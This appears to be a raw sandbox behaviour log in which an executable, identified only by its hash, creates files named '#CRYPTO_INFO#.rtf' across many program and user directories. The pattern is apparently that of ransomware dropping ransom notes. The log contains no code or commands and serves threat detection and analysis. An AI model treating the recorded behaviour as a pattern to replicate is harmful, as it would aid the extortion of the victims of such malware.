C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\pl-pl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\hu-hu\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\fr-fr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.PPIProjection_cw5n1h2txyewy\Settings\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\280807\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\root\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Comms\UnistoreDB\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\root\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\da-dk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Code Cache\wasm\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ru-ru\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\cs-cz\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\en-il\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\configuration\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\cs-cz\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\ProgramData\Microsoft OneDrive\setup\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cookie\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Multimedia\MPP\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ca-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\de-de\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ti\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\root\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\All Users\Microsoft\Windows Live\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\ext\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\fr-fr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\hu-hu\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\sv-se\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\zh-tw\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{0c6de78d-ad73-4b27-9c43-27f606b72dfa}\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\themes\dark\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\tr\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\sr\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\sv-se\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\pt-br\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\cs-cz\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\fr-ma\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\da-dk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\en-il\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\css\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Google\Update\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Cache\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\sl-si\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\lib\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\cs-cz\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\hu-hu\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\en-il\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\nb-no\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\si\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\nl-nl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\ja-jp\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Mozilla Firefox\defaults\pref\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\mt-MT\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\hr-hr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\zh-tw\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\core\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\da-dk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\zh-cn\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\es-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\fr-ma\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\en-il\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\tr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\es-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\lua\meta\art\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\cs-cz\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\it-it\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\qml\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\nb-no\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\nl-nl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\en-il\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\eu-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\lua\meta\reader\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\fr-ma\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\tl\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Code Cache\wasm\index-dir\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Packages\CortanaListenUIApp_cw5n1h2txyewy\Settings\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\css\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\es-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\css\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\sl-si\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\ProgramData\Mozilla\updates\308046B0AF4A39CB\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\skins\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\kn\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account-select\js\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\sv-se\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\he-il\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\sr-Latn-RS\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\Settings\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\jre\lib\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\nl-nl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\Settings\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\Links\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\pt-br\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\sl-si\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\ru-ru\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\nn-NO\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\LocalLow\Oracle\Java\jdk1.8.0_66_x64\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\it-it\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\fi-fi\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\ko-kr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\tr-tr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\hr-hr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\fi-fi\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\PFM\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\Settings\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\gd\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\cs-cz\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\pl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\zh-cn\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\sv-se\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\ro-ro\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{d6d05980-afe4-40d7-837a-a43140a71704}\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created 